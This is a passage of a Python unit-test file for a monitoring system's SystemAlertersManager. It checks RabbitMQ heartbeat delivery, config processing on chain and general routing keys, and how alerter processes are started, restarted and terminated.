            self.test_manager._initialise_rabbitmq()
            # Delete the queue before to avoid messages in the queue on error.
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            self.test_manager.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            self.test_manager._send_heartbeat(self.test_heartbeat)
            # By re-declaring the queue again we can get the number of messages
            # in the queue. passive=True checks the existing queue without
            # re-creating it.
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=True
            )
            self.assertEqual(1, res.method.message_count)
            # Check that the message received is actually the HB
            _, _, body = self.test_manager.rabbitmq.basic_get(
                self.test_queue_name)
            self.assertEqual(self.test_heartbeat, json.loads(body))
        except Exception as e:
            self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing, 'Process')
def test_create_and_start_alerter_process_stores_the_correct_process_info(
self, mock_init, mock_start, mock_push_and_send) -> None:
mock_start.return_value = None
mock_init.return_value = self.dummy_process3
mock_push_and_send.return_value = None
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
self.expected_output[self.parent_id_3] = {}
new_entry = self.expected_output[self.parent_id_3]
new_entry['component_name'] = SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_3)
new_entry['chain'] = self.chain_3
new_entry['process'] = self.dummy_process3
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
self.assertEqual(self.expected_output,
self.test_manager.parent_id_process_dict)
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(multiprocessing.Process, "start")
def test_create_and_start_alerter_process_creates_the_correct_process(
self, mock_start, mock_push_and_send) -> None:
mock_start.return_value = None
mock_push_and_send.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
new_entry = self.test_manager.parent_id_process_dict[self.parent_id_3]
new_entry_process = new_entry['process']
self.assertTrue(new_entry_process.daemon)
self.assertEqual(2, len(new_entry_process._args))
self.assertEqual(self.system_alerts_config, new_entry_process._args[0])
self.assertEqual(self.chain_3, new_entry_process._args[1])
self.assertEqual(start_system_alerter, new_entry_process._target)
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
def test_create_and_start_alerter_process_starts_the_process(
self, mock_create_logger, mock_push_and_send, mock_start) -> None:
mock_create_logger.return_value = self.dummy_logger
mock_push_and_send.return_value = None
mock_start.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
mock_start.assert_called_once()
@freeze_time("2012-01-01")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
def test_create_and_start_alerter_process_sends_a_component_reset_alert(
self, mock_create_logger, mock_push_and_send, mock_start) -> None:
mock_create_logger.return_value = self.dummy_logger
mock_push_and_send.return_value = None
mock_start.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
test_alert = ComponentResetAlert(
SYSTEM_ALERTER_NAME_TEMPLATE.format(self.chain_3),
datetime.now().timestamp(), SystemAlerter.__name__,
self.parent_id_3, self.chain_3)
mock_push_and_send.assert_called_once_with(test_alert.alert_data)
    @mock.patch.object(SystemAlertersManager,
                       "_create_and_start_alerter_process")
    @mock.patch("src.alerter.managers.system.SystemAlertsConfig")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_process_configs_ignores_default_key(self, mock_ack,
                                                 mock_alerts_config,
                                                 mock_create_start) -> None:
        """A DEFAULT section in an incoming configs message must be ignored
        on both the chain and the general routing keys.
        """
        # This test will pass if the stored systems config does not change.
        # This would mean that the DEFAULT key was ignored, otherwise, it would
        # have been included as a new config.
        mock_create_start.return_value = None
        mock_ack.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain = json.dumps(self.sent_configs_example_with_default)
            body_general = json.dumps(self.sent_configs_example_with_default)
            properties = pika.spec.BasicProperties()
            # We will send the message twice with both general and chain
            # routing keys to make sure that the DEFAULT key is ignored in both
            # cases
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general)
            # Only the non-DEFAULT section should have produced a config.
            mock_alerts_config.assert_called_once_with(
                parent_id=self.parent_id_1,
                open_file_descriptors=self.open_file_descriptors,
                system_cpu_usage=self.system_cpu_usage,
                system_storage_usage=self.system_storage_usage,
                system_ram_usage=self.system_ram_usage,
                system_is_down=self.system_is_down
            )
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain)
            self.assertEqual(2, mock_alerts_config.call_count)
            mock_alerts_config.assert_called_with(
                parent_id=self.parent_id_1,
                open_file_descriptors=self.open_file_descriptors,
                system_cpu_usage=self.system_cpu_usage,
                system_storage_usage=self.system_storage_usage,
                system_ram_usage=self.system_ram_usage,
                system_is_down=self.system_is_down
            )
        except Exception as e:
            self.fail("Test failed: {}".format(e))
        # Both messages must have been acknowledged, DEFAULT key or not.
        self.assertEqual(2, mock_ack.call_count)
    @mock.patch("src.alerter.managers.system.SystemAlertsConfig")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(SystemAlertersManager,
                       "_create_and_start_alerter_process")
    def test_process_configs_stores_new_configs_to_be_alerted_correctly(
            self, startup_mock, mock_ack, mock_system_alerts_config) -> None:
        """Both new and modified configs, arriving on either the chain or the
        general routing key, must construct a SystemAlertsConfig with exactly
        the threshold values received.
        """
        mock_ack.return_value = None
        startup_mock.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            call_1 = call(parent_id=self.parent_id_1,
                          open_file_descriptors=self.open_file_descriptors,
                          system_cpu_usage=self.system_cpu_usage,
                          system_storage_usage=self.system_storage_usage,
                          system_ram_usage=self.system_ram_usage,
                          system_is_down=self.system_is_down)
            mock_system_alerts_config.assert_has_calls([call_1])
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            call_2 = call(parent_id=self.parent_id_2,
                          open_file_descriptors=self.open_file_descriptors_2,
                          system_cpu_usage=self.system_cpu_usage_2,
                          system_storage_usage=self.system_storage_usage_2,
                          system_ram_usage=self.system_ram_usage_2,
                          system_is_down=self.system_is_down_2)
            mock_system_alerts_config.assert_has_calls([call_2])
            # Flip the 'enabled' flag so the re-sent configs count as modified.
            self.open_file_descriptors['enabled'] = str(
                not bool(self.enabled_alert))
            self.open_file_descriptors_2['enabled'] = str(
                not bool(self.enabled_alert))
            self.sent_configs_example_with_default[
                '1'] = self.open_file_descriptors
            self.sent_configs_example_with_default_2[
                '1'] = self.open_file_descriptors_2
            body_new_configs_chain = json.dumps(
                self.sent_configs_example_with_default)
            body_new_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain)
            call_3 = call(parent_id=self.parent_id_1,
                          open_file_descriptors=self.open_file_descriptors,
                          system_cpu_usage=self.system_cpu_usage,
                          system_storage_usage=self.system_storage_usage,
                          system_ram_usage=self.system_ram_usage,
                          system_is_down=self.system_is_down)
            mock_system_alerts_config.assert_has_calls([call_3])
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            call_4 = call(parent_id=self.parent_id_2,
                          open_file_descriptors=self.open_file_descriptors_2,
                          system_cpu_usage=self.system_cpu_usage_2,
                          system_storage_usage=self.system_storage_usage_2,
                          system_ram_usage=self.system_ram_usage_2,
                          system_is_down=self.system_is_down_2)
            mock_system_alerts_config.assert_has_calls([call_4])
            self.assertEqual(4, mock_system_alerts_config.call_count)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch("src.alerter.managers.system.SystemAlertsConfig")
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(multiprocessing.Process, "start")
    @mock.patch.object(multiprocessing.Process, "terminate")
    @mock.patch.object(multiprocessing.Process, "join")
    def test_process_configs_stores_modified_configs_to_be_alerted_on_correctly(
            self, mock_join, mock_terminate, mock_start, mock_ack,
            mock_push_and_send, mock_system_alerts_config) -> None:
        """A modified config must terminate and join the chain's old alerter
        process (new configs must not), while keeping the chain's entry in the
        process dict.
        """
        mock_ack.return_value = None
        mock_start.return_value = None
        mock_join.return_value = None
        mock_terminate.return_value = None
        mock_push_and_send.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # Brand-new configs: nothing to terminate yet.
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            mock_join.assert_not_called()
            mock_terminate.assert_not_called()
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            mock_join.assert_not_called()
            mock_terminate.assert_not_called()
            # Flip the 'enabled' flag so the re-sent configs count as modified.
            self.open_file_descriptors['enabled'] = str(
                not bool(self.enabled_alert))
            self.open_file_descriptors_2['enabled'] = str(
                not bool(self.enabled_alert))
            self.sent_configs_example_with_default[
                '1'] = self.open_file_descriptors
            self.sent_configs_example_with_default_2[
                '1'] = self.open_file_descriptors_2
            body_new_configs_chain = json.dumps(
                self.sent_configs_example_with_default)
            body_new_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain)
            self.assertEqual(1, mock_join.call_count)
            self.assertEqual(1, mock_terminate.call_count)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            self.assertEqual(2, mock_join.call_count)
            self.assertEqual(2, mock_terminate.call_count)
            self.assertTrue(
                self.parent_id_1 in self.test_manager.parent_id_process_dict)
            self.assertTrue(
                self.parent_id_2 in self.test_manager.parent_id_process_dict)
            self.assertEqual(4, mock_system_alerts_config.call_count)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch("src.alerter.managers.system.SystemAlertsConfig")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(SystemAlertersManager,
                       "_create_and_start_alerter_process")
    def test_proc_configs_starts_new_alerters_for_new_configs_to_be_alerted_on(
            self, startup_mock, mock_ack, mock_system_alerters_config,
            mock_push_and_send) -> None:
        """A brand-new config on either routing key must trigger
        `_create_and_start_alerter_process` with the built config, parent id
        and chain name.
        """
        # NOTE(review): since SystemAlertsConfig is mocked, both of these calls
        # yield the mock's return_value; the values below stand in for the
        # configs the manager is expected to build — confirm this is intended.
        mock_system_alerters_config_1 = mock_system_alerters_config(
            parent_id=self.parent_id_1,
            open_file_descriptors=self.open_file_descriptors,
            system_cpu_usage=self.system_cpu_usage,
            system_storage_usage=self.system_storage_usage,
            system_ram_usage=self.system_ram_usage,
            system_is_down=self.system_is_down)
        mock_system_alerters_config_2 = mock_system_alerters_config(
            parent_id=self.parent_id_2,
            open_file_descriptors=self.open_file_descriptors_2,
            system_cpu_usage=self.system_cpu_usage_2,
            system_storage_usage=self.system_storage_usage_2,
            system_ram_usage=self.system_ram_usage_2,
            system_is_down=self.system_is_down_2)
        mock_ack.return_value = None
        startup_mock.return_value = None
        mock_push_and_send.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.assertEqual(1, startup_mock.call_count)
            startup_mock.assert_called_once_with(
                mock_system_alerters_config_1, self.parent_id_1,
                self.chain_1
            )
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_general_initial)
            self.assertEqual(2, startup_mock.call_count)
            startup_mock.assert_called_with(
                mock_system_alerters_config_2, self.parent_id_2,
                self.chain_2
            )
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch("src.alerter.alerter_starters.create_logger")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_proc_confs_term_and_starts_alerters_for_modified_confs_to_be_alerted_on(
            self, mock_ack, mock_create_logger, mock_push_and_send) -> None:
        """Integration test: a modified config must terminate the chain's
        running alerter process and start a fresh one.

        NOTE: Process.start/terminate are NOT mocked here — real child
        processes are spawned and liveness is checked with is_alive().
        """
        mock_ack.return_value = None
        mock_create_logger.return_value = self.dummy_logger
        mock_push_and_send.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Assure that the processes have been started
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_1]['process'].is_alive())
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_2]['process'].is_alive())
            # Give some time till the process starts
            time.sleep(1)
            # Keep handles on the original processes so we can verify below
            # that they were terminated, not reused.
            parent_id_1_old_proc = self.test_manager.parent_id_process_dict[
                self.parent_id_1]['process']
            parent_id_2_old_proc = self.test_manager.parent_id_process_dict[
                self.parent_id_2]['process']
            # Flip the 'enabled' flag so the re-sent configs count as modified.
            self.open_file_descriptors['enabled'] = str(
                not bool(self.enabled_alert))
            self.open_file_descriptors_2['enabled'] = str(
                not bool(self.enabled_alert))
            self.sent_configs_example_with_default[
                '1'] = self.open_file_descriptors
            self.sent_configs_example_with_default_2[
                '1'] = self.open_file_descriptors_2
            body_new_configs_chain = json.dumps(
                self.sent_configs_example_with_default)
            body_new_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            # Give some time till the process re-starts
            time.sleep(1)
            # Check that the old process has terminated and a new one has
            # started.
            self.assertFalse(parent_id_1_old_proc.is_alive())
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_1]['process'].is_alive())
            self.assertFalse(parent_id_2_old_proc.is_alive())
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_2]['process'].is_alive())
            # Clean before finishing
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].join()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].join()
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch("src.alerter.alerter_starters.create_logger")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_proc_configs_term_and_stops_alerters_for_removed_configs(
            self, mock_ack, mock_create_logger, mock_push_and_send) -> None:
        """Integration test: an empty configs message must terminate the
        chain's alerter process and remove the chain's entries from both the
        process dict and the stored configs.

        NOTE: Process.start/terminate are NOT mocked here — real child
        processes are spawned and liveness is checked with is_alive().
        """
        mock_ack.return_value = None
        mock_push_and_send.return_value = None
        mock_create_logger.return_value = self.dummy_logger
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Assure that the processes have been started
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_1]['process'].is_alive())
            self.assertTrue(self.test_manager.parent_id_process_dict[
                                self.parent_id_2]['process'].is_alive())
            # Give some time till the process starts
            time.sleep(1)
            # Keep handles on the originals so termination can be verified.
            parent_id_1_old_proc = self.test_manager.parent_id_process_dict[
                self.parent_id_1]['process']
            parent_id_2_old_proc = self.test_manager.parent_id_process_dict[
                self.parent_id_2]['process']
            # An empty message represents the configs having been removed.
            body_new_configs_chain = json.dumps(self.empty_message)
            body_new_configs_general = json.dumps(self.empty_message)
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            # Give some time till the process re-starts
            time.sleep(1)
            # Check that the old process has terminated and no new one has
            # taken its place.
            self.assertFalse(parent_id_1_old_proc.is_alive())
            self.assertFalse(parent_id_2_old_proc.is_alive())
            self.assertFalse(
                self.parent_id_1 in self.test_manager.parent_id_process_dict)
            self.assertFalse(
                self.parent_id_1 in self.test_manager.systems_alerts_configs)
            self.assertFalse(
                self.parent_id_2 in self.test_manager.parent_id_process_dict)
            self.assertFalse(
                self.parent_id_2 in self.test_manager.systems_alerts_configs)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch("src.alerter.managers.system.SystemAlertsConfig")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(SystemAlertersManager,
                       "_create_and_start_alerter_process")
    @mock.patch.object(multiprocessing.Process, "join")
    @mock.patch.object(multiprocessing.Process, "terminate")
    def test_process_confs_restarts_an_updated_alerter_with_the_correct_conf(
            self, mock_terminate, mock_join, startup_mock, mock_ack,
            mock_system_alerters_config) -> None:
        """When a stored config is updated, the restarted alerter must be
        given the NEW config, parent id and chain name.
        """
        mock_ack.return_value = None
        startup_mock.return_value = None
        mock_join.return_value = None
        mock_terminate.return_value = None
        # Pre-populate state so the incoming configs count as updates, not
        # brand-new configs.
        self.test_manager._systems_alerts_configs[self.parent_id_1] = \
            self.system_alerts_config
        self.test_manager._systems_alerts_configs[self.parent_id_2] = \
            self.system_alerts_config_2
        self.test_manager._parent_id_process_dict = \
            self.config_process_dict_example
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            # Flip the 'enabled' flag so the sent configs differ from the
            # stored ones.
            self.open_file_descriptors['enabled'] = str(
                not bool(self.enabled_alert))
            self.open_file_descriptors_2['enabled'] = str(
                not bool(self.enabled_alert))
            self.sent_configs_example_with_default[
                '1'] = self.open_file_descriptors
            self.sent_configs_example_with_default_2[
                '1'] = self.open_file_descriptors_2
            # NOTE(review): SystemAlertsConfig is mocked, so both calls return
            # the mock's return_value; these stand in for the configs the
            # manager is expected to build.
            mock_system_alerters_config_1 = mock_system_alerters_config(
                parent_id=self.parent_id_1,
                open_file_descriptors=self.open_file_descriptors,
                system_cpu_usage=self.system_cpu_usage,
                system_storage_usage=self.system_storage_usage,
                system_ram_usage=self.system_ram_usage,
                system_is_down=self.system_is_down)
            mock_system_alerters_config_2 = mock_system_alerters_config(
                parent_id=self.parent_id_2,
                open_file_descriptors=self.open_file_descriptors_2,
                system_cpu_usage=self.system_cpu_usage_2,
                system_storage_usage=self.system_storage_usage_2,
                system_ram_usage=self.system_ram_usage_2,
                system_is_down=self.system_is_down_2)
            body_updated_configs_chain = json.dumps(
                self.sent_configs_example_with_default)
            body_updated_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_updated_configs_chain)
            startup_mock.assert_called_with(
                mock_system_alerters_config_1, self.parent_id_1,
                self.chain_1
            )
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_updated_configs_general)
            startup_mock.assert_called_with(
                mock_system_alerters_config_2, self.parent_id_2,
                self.chain_2
            )
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_process_configs_ignores_new_configs_with_missing_keys(
            self, mock_ack, mock_push_and_send) -> None:
        """A new config missing expected keys must be acked and ignored
        without raising or mutating the stored configs.
        """
        # We will check whether the state is kept intact if new configurations
        # with missing keys are sent. Exceptions should never be raised in this
        # case, and basic_ack must be called to ignore the message.
        mock_ack.return_value = None
        mock_push_and_send.return_value = None
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_new_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            body_new_configs_chain_missing = json.dumps(
                self.sent_configs_example_with_missing_keys)
            properties = pika.spec.BasicProperties()
            # This should start a process as normal
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            self.assertEqual(1, mock_ack.call_count)
            self.assertTrue(
                self.parent_id_2 in self.test_manager.systems_alerts_configs)
            # This should fail to start a process as there are missing keys
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain_missing)
            self.assertEqual(2, mock_ack.call_count)
            self.assertFalse(
                self.parent_id_1 in self.test_manager.systems_alerts_configs)
            # Clean up the real process started for parent_id_2 above.
            self.test_manager._terminate_and_join_chain_alerter_processes(
                self.parent_id_2)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_process_configs_ignores_modified_configs_with_missing_keys(
            self, mock_ack, mock_push_and_send) -> None:
        """A modified config missing expected keys must be acked and ignored,
        leaving the process dict and stored configs untouched.
        """
        # We will check whether the state is kept intact if modified
        # configurations with missing keys are sent. Exceptions should never be
        # raised in this case, and basic_ack must be called to ignore the
        # message.
        mock_ack.return_value = None
        mock_push_and_send.return_value = None
        # Pre-populate state so the incoming configs count as modifications.
        self.test_manager._systems_alerts_configs[self.parent_id_1] = \
            self.system_alerts_config
        self.test_manager._systems_alerts_configs[self.parent_id_2] = \
            self.system_alerts_config_2
        self.test_manager._parent_id_process_dict = \
            self.config_process_dict_example
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_updated_configs_chain = json.dumps(
                self.sent_configs_example_with_missing_keys)
            body_updated_configs_general = json.dumps(
                self.sent_configs_example_with_default_2_missing_keys)
            properties = pika.spec.BasicProperties()
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_updated_configs_general)
            self.assertEqual(1, mock_ack.call_count)
            self.assertEqual(self.config_process_dict_example,
                             self.test_manager.parent_id_process_dict)
            # NOTE(review): this checks parent_id_1's stored config after the
            # general (parent_id_2) message, and parent_id_2's after the chain
            # message below — both must remain unchanged either way; confirm
            # the cross-check is intentional.
            self.assertEqual(self.system_alerts_config,
                             self.test_manager.systems_alerts_configs[
                                 self.parent_id_1])
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_updated_configs_chain)
            self.assertEqual(2, mock_ack.call_count)
            self.assertEqual(self.config_process_dict_example,
                             self.test_manager.parent_id_process_dict)
            self.assertEqual(self.system_alerts_config_2,
                             self.test_manager.systems_alerts_configs[
                                 self.parent_id_2])
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_nack")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    def test_process_configs_ignores_confs_if_ComponentResetAlert_fails(
            self, mock_ack, mock_nack, mock_push_and_send) -> None:
        """If delivering the ComponentResetAlert fails, the config must not be
        stored and the message must be nacked for redelivery.
        """
        # We will check whether the state is kept intact if a
        # ComponentResetAlert fails in being delivered. Exceptions should never
        # be raised in this case, and basic_nack must be called so the message
        # is re-delivered.
        mock_nack.return_value = None
        mock_ack.return_value = None
        # First push succeeds, second one simulates a delivery failure.
        mock_push_and_send.side_effect = [
            None, MessageWasNotDeliveredException('test')
        ]
        try:
            # Must create a connection so that the blocking channel is passed
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            # We will send new configs through both the existing and
            # non-existing chain and general paths to make sure that all routes
            # work as expected.
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_new_configs_general = json.dumps(
                self.sent_configs_example_with_default_2)
            body_new_configs_chain = json.dumps(
                self.sent_configs_example_with_default)
            properties = pika.spec.BasicProperties()
            # This should start a process as normal
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties,
                                               body_new_configs_general)
            self.assertEqual(1, mock_ack.call_count)
            self.assertTrue(
                self.parent_id_2 in self.test_manager.systems_alerts_configs)
            # This should fail to start a process as we will automate a
            # MessageWasNotDeliveredException
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties,
                                               body_new_configs_chain)
            # ack count unchanged: the failed message was nacked instead.
            self.assertEqual(1, mock_ack.call_count)
            self.assertFalse(
                self.parent_id_1 in self.test_manager.systems_alerts_configs)
            self.assertEqual(1, mock_nack.call_count)
            # Clean up the real process started for parent_id_2 above.
            self.test_manager._terminate_and_join_chain_alerter_processes(
                self.parent_id_2)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @freeze_time("2012-01-01")
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(multiprocessing.Process, "is_alive")
    @mock.patch.object(multiprocessing.Process, "start")
    @mock.patch.object(multiprocessing.Process, "join")
    @mock.patch.object(multiprocessing.Process, "terminate")
    def test_process_ping_sends_a_valid_hb_if_all_processes_are_alive(
            self, mock_terminate, mock_join, mock_start, mock_is_alive,
            mock_ack, mock_push_and_send) -> None:
        """Both alerter processes report alive -> heartbeat lists both as
        running and none as dead.
        """
        # This test creates a queue which receives messages with the same
